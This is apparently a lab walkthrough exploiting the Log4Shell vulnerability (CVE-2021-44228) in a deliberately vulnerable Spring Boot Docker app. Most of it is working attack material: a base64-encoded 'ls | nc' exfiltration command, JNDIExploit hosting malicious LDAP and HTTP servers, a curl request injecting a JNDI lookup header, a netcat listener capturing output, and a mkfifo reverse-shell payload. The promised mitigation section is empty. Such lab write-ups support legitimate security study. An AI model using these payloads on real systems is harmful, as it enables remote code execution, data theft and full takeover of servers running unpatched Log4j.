CVE-2021–44228 — Log4shell
Proof-of-Concept for Critical Apache Log4j Remote Code Execution Vulnerability Available (Log4Shell)
For this exercise I will be targeting hosted docker with a vulnerable java application, you can find it here:
https://github.com/twseptian/Spring-Boot-Log4j-CVE-2021-44228-Docker-Lab
Exploitation:
First we need to Write the command in base64:
└──╼ #echo "ls | nc 172.20.10.2 80" | base64
bHMgfCBuYyAxNzIuMjAuMTAuMiA4MAo=
After that we need to host the vulnerable LDAP server & the HTTP server.
The below jar file will do the following:
- Host LDAP server.
- Host HTTP server.
- Create .class file based on the base64 payload
└──╼ #java -jar JNDIExploit-1.2-SNAPSHOT.jar
Error: The following option is required: [-i | --ip]
Usage: java -jar JNDIExploit-1.2-SNAPSHOT.jar [options]
Options:
* -i, --ip Local ip address
-l, --ldapPort Ldap bind port (default: 1389)
-p, --httpPort Http bind port (default: 8080)
-u, --usage Show usage (default: false)
-h, --help Show this help
└──╼ #java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 172.20.10.2 -l 1234 -p 800
[+] LDAP Server Start Listening on 1234...
[+] HTTP Server Start Listening on 800...
If we run the exploit using the below curl command — we are sending the IP for our malicious LDAP server that was created in the previous step — and we also send the base64 command:
└──╼ #curl 172.17.0.1:8080 -H 'X-Api-Version: ${jnd i:ldap://172.20.10.2:1234/Basic/Command/Base64/bHMgfCBuYyAxNzIuMjAuMTAuMiA4MAo=}'
Hello, world!
The LDAP server should get a request from the victim machine — and then LDAP server will redirect the machine to our malicious HTTP server that hosts the .class exploit:
└──╼ #java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 172.20.10.2 -l 1234 -p 800
[+] LDAP Server Start Listening on 1234...
[+] HTTP Server Start Listening on 800...
[+] Received LDAP Query: Basic/Command/Base64/bHMgfCBuYyAxNzIuMjAuMTAuMiA4MAo=
[+] Paylaod: command
[+] Command: ls
| nc 172.20.10.2 80
[+] Sending LDAP ResourceRef result for
Basic/Command/Base64/bHMgfCBuYyAxNzIuMjAuMTAuMiA4MAo= with basic remote reference payload
[+] Send LDAP reference result for
Basic/Command/Base64/bHMgfCBuYyAxNzIuMjAuMTAuMiA4MAo= redirecting to http://172.20.10.2:800/ExploitcjWF0rQsqL.class
[+] New HTTP Request From /172.17.0.2:55030 /ExploitcjWF0rQsqL.class
[+] Receive ClassRequest: ExploitcjWF0rQsqL.class
[+] Response Code: 200
Then we should receive the output of the command as shown below:
└──╼ #nc -lvnp 80
listening on [any] 80 ...
connect to [172.20.10.2] from (UNKNOWN) [172.17.0.2] 33701
app
bin
dev
etc
home
lib
media
mnt
proc
root
run
sbin
srv
sys
tmp
usr
var
Getting Shell:
- Create the payload:
└──╼ #echo "rm f;mkfifo f;cat f|sh -i 2>&1|nc 172.20.10.2 80 >f" | base64
cm0gZjtta2ZpZm8gZjtjYXQgZnxzaCAtaSAyPiYxfG5jIDE3Mi4yMC4xMC4yIDgwID5mCg=
- Send the exploit:
└──╼ #curl 172.17.0.1:8080 -H 'X-Api-Version: ${jn di:ldap://172.20.10.2:1234/Basic/Command/Base64/cm0gZjtta2ZpZm8gZjtjYXQgZnxzaCAtaSAyPiYxfG5jIDE3Mi4yMC4xMC4yIDgwID5mCg==}'
- Finally. getting the shell
Mitigation:
The below topology will show how to mitigate the attack in each step possible:
More vulnerable applications
Minecraft:
Ghidra: